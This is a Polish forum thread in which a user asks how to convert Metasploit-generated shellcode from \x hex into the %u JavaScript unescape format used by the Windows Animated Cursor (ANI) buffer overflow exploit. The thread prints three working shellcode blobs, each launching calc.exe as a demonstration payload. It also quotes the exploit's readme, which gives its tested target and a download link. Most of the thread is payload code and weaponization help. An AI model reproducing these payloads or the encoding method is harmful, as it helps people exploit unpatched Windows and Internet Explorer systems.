Pokaż wyniki 1 do 3 z 3

Temat: unescape shellcode jak to ?

  1. #1
    Zarejestrowany
    Dec 2007
    Skąd
    Okolice W-a
    Postów
    11

    Domyślnie unescape shellcode jak to ?

    Cześć, mam problem z pewnym exploitem:
    Windows Animated Cursor Handling Exploit
    Jego shellcode jest zapisnay tak:
    Kod:
    shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065");
    ten odapla akurat calc.exe
    i teraz nie wiem jak z takiego shellcode wygenrowanego z metasploit.com
    Kod:
    "\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x56"
    "\xb1\x9e\x1f\x83\xeb\xfc\xe2\xf4\xaa\x59\xda\x1f\x56\xb1\x15\x5a"
    "\x6a\x3a\xe2\x1a\x2e\xb0\x71\x94\x19\xa9\x15\x40\x76\xb0\x75\x56"
    "\xdd\x85\x15\x1e\xb8\x80\x5e\x86\xfa\x35\x5e\x6b\x51\x70\x54\x12"
    "\x57\x73\x75\xeb\x6d\xe5\xba\x1b\x23\x54\x15\x40\x72\xb0\x75\x79"
    "\xdd\xbd\xd5\x94\x09\xad\x9f\xf4\xdd\xad\x15\x1e\xbd\x38\xc2\x3b"
    "\x52\x72\xaf\xdf\x32\x3a\xde\x2f\xd3\x71\xe6\x13\xdd\xf1\x92\x94"
    "\x26\xad\x33\x94\x3e\xb9\x75\x16\xdd\x31\x2e\x1f\x56\xb1\x15\x77"
    "\x6a\xee\xaf\xe9\x36\xe7\x17\xe7\xd5\x71\xe5\x4f\x3e\x41\x14\x1b"
    "\x09\xd9\x06\xe1\xdc\xbf\xc9\xe0\xb1\xd2\xff\x73\x35\x9f\xfb\x67"
    "\x33\xb1\x9e\x1f"
    uzyskać shellcode w takim formacie jak jest w tym exploicie. Byl bym baaardzo wdzięczny jeśli ktoś by mi w tym pomógł bo jest mi to potrzebne do szkoły.

  2. #2
    rip
    rip jest offline Banned
    Zarejestrowany
    May 2008
    Postów
    534

    Domyślnie

    \x zamien na %

    to nie jest to samo.

  3. #3
    Zarejestrowany
    Dec 2007
    Skąd
    Okolice W-a
    Postów
    11

    Domyślnie

    Cytat Napisał rip Zobacz post
    \x zamien na %

    to nie jest to samo.
    Zamiana \x na % nie da tego samego bo ten shellcode w java script jest 2 bajtowy np. %ue8fc

    Powinno być to samo bo w opisie exploita mam napisane wyraźnie, że zostal uzyty generator z metasploit.com
    Kod:
    Microsoft ANI Buffer Overflow Exploit
    
    Author: Trirat Puttaraksa
    http://sf-freedom.blogspot.com
    
    Tested on: Windows XP SP2 fully patched + IE 6 SP2
    
    For educational purpose only
    
    There are many confuses about this vulnerability. Someone said that this could
    not be exploited in XP SP2 - that's wrong. I provide this exploit because I 
    wanna to tell these people that they are in danger. 
    This exploit will call calc.exe (shellcode fome metasploit win32_exec 
    CMD=calc.exe EXITFUNC=process).
    
    P.S. I do not include the source code for generate the .ani file because of
    its damage. However, if you reverse engineer .ani file, you will know how
    could I produce this exploit in 10 minutes.
    
    I will describe this vulnerability and how to exploit it in my blog 
    after M$ released patch.
    
    greets: used SkyLined's idea of exploitation.  tnx to him.
    
    http://www.milw0rm.com/sploits/04012007-ani.zip
    
    # milw0rm.com [2007-04-01]
    i wygenerowalem:
    Kod:
    /* win32_exec -  EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
    unsigned char scode[] =
    "\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x44"
    "\x46\x39\xc7\x83\xeb\xfc\xe2\xf4\xb8\xae\x7d\xc7\x44\x46\xb2\x82"
    "\x78\xcd\x45\xc2\x3c\x47\xd6\x4c\x0b\x5e\xb2\x98\x64\x47\xd2\x8e"
    "\xcf\x72\xb2\xc6\xaa\x77\xf9\x5e\xe8\xc2\xf9\xb3\x43\x87\xf3\xca"
    "\x45\x84\xd2\x33\x7f\x12\x1d\xc3\x31\xa3\xb2\x98\x60\x47\xd2\xa1"
    "\xcf\x4a\x72\x4c\x1b\x5a\x38\x2c\xcf\x5a\xb2\xc6\xaf\xcf\x65\xe3"
    "\x40\x85\x08\x07\x20\xcd\x79\xf7\xc1\x86\x41\xcb\xcf\x06\x35\x4c"
    "\x34\x5a\x94\x4c\x2c\x4e\xd2\xce\xcf\xc6\x89\xc7\x44\x46\xb2\xaf"
    "\x78\x19\x08\x31\x24\x10\xb0\x3f\xc7\x86\x42\x97\x2c\x38\xe1\x25"
    "\x37\x2e\xa1\x39\xce\x48\x6e\x38\xa3\x25\x58\xab\x27\x68\x5c\xbf"
    "\x21\x46\x39\xc7";
    Jedynie Encoder może się nie zgadzać bo nie wiem jakiego użyli...

Podobne wątki

  1. Shellcode nie działa
    By Ormi in forum Assembler
    Odpowiedzi: 9
    Autor: 07-20-2008, 12:31
  2. win32 shellcode
    By naichniach in forum Off Topic
    Odpowiedzi: 5
    Autor: 12-01-2007, 11:38
  3. Odczyt shellcode
    By zorlan in forum Newbie - dla początkujących!
    Odpowiedzi: 8
    Autor: 05-14-2007, 21:13
  4. Jak obliczyć/znaleźć adres shellcode -u?
    By I_v0 in forum Newbie - dla początkujących!
    Odpowiedzi: 6
    Autor: 06-07-2006, 11:13

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52